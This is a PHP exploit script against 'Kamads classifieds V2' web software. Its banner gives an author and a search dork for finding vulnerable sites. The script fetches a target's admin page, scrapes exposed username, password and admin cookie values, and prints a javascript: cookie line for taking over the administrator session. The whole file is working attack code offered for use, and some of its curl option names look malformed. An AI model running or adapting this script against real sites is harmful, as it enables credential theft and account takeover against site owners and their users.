<?php


if ($argc < 2) 
{ 
echo "\n+-----------------------------------------------------------------+\n"; 
echo "|         Kamads classifieds V2 Multiple Vulnerabilities            |\n"; 
echo "|                          Author:Mr.tro0oqy                        |\n"; 
echo "|                          uxxd@hotmail.com                         |\n";   
echo "|                        dork:inurl:V2A_XHTML                       |\n";  
echo "|                                                                   |\n";               
echo "+-------------------------------------------------------------------+\n";
print "\nUsage........: php $argv[0] <host><path><admin.php>\n"; 
print "\nex...........: php $argv[0] http://www.target.com/V2A_XHTML/admin/admin.php\n";
die(); 
}else {


$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$argv[1]");
$op1 = curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch,COOKIESESSION,true);
curl_setopt($ch,CUSTOMREQUEST,"get");
$x = curl_exec($ch);


if ($t = stristr($x,"username = ") and  stristr($x,"password = ")) {
echo "\n";
echo "\n";
echo $new = substr($t,0,94);


if ($co=stristr($x,"theCookieName") and $co2=stristr($x,"theCookieValue")) {

echo "\n";
echo "\n";
echo $new2 = substr($co,0,35);
echo "\n";
echo $new3 =substr($co2,0,40);
echo "\n";
echo "\n";

$ja = substr($new2,17,15);
echo "\n";
$ja2 = substr($new3,18,18);
echo "\n";
echo "\n";
echo "\n";


echo $exploit =  "javascript:document.cookie=\"$ja=$ja2;path=/\";";
echo "\n";
echo "\n";
echo "\n";
}



}else {
echo "not found";

}

}
?>